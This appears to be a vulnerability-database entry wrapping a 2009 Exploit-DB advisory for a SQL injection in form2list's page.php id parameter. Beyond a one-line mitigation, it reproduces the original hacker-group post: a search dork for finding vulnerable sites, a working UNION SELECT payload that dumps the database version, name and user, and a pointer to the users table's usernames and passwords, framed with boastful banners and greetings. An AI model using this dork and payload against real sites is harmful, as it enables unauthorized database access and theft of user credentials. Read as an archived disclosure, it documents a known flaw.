form2list (page.php) (id) Remote SQL injection Vulnerability

vendor:

by:

BadBoy

7.5

CVSS

HIGH

Remote SQL injection

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

form2list (page.php) (id) Remote SQL injection Vulnerability

The form2list (page.php) (id) vulnerability allows remote attackers to inject SQL commands via the id parameter.

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

*********************************************************************************************       
[!]                                                                                       [!]
[!] OOOO             O                                 OOOOOOOOO                          [!]
[!]O    O            O                                 O      O                           [!]
[!]O                 O                                       O                            [!]
[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
[!]          OO                                                                           [!]
[!]         OO                                                                            [!]
[!]        OO                          Proud To Be MoroCCaN                               [!]
[!]       OO                                                                              [!]
*********************************************************************************************
       BadBoy From : Institut PrivÃ© Des Enseignement TeChnique Et Informatique "IPETI"
---------------------------------------------------------------------------------------------
=             form2list (page.php)  (id) Remote SQL injection Vulnerability                 =
---------------------------------------------------------------------------------------------
                                  SeCuriTy Is NoNe
---------------------------------------------------------------------------------------------
-===========================================================================================-
-=                  SQL InjEction By : Cyber-Zone                                          =-
-=                                                                                         =-
-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
-=                                                                                         =-
-=                  Home : WwW.sql-w0rm.Org                                                =-
-===========================================================================================-
---------------------------------------------------------------------------------------------
-
- Script home : www.form2list.com
-
-
- Dork : Powered By form2list
-
-
- Exploit : [Target]/page.php?id=[SQL]
-
-         : [Target]/page.php?id=-1+union+select+concat_ws(0x3a3a,version(),database(),user()),2,3,4,5,6,7,8--
-
-
- you can see all informations in source page
-
- users::username
- users::password
-
-
---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-=                          Hussin X , CraCkEr , Sakab , xXx                               =-
-=                                                                                         =-
-=                            TrYaG , WwW.No-ExploiT.Com                                   =-
-=                                                                                         =-
-=                              AnA MaGhribi Den MouK                                      =-
-===========================================================================================-

# milw0rm.com [2009-04-03]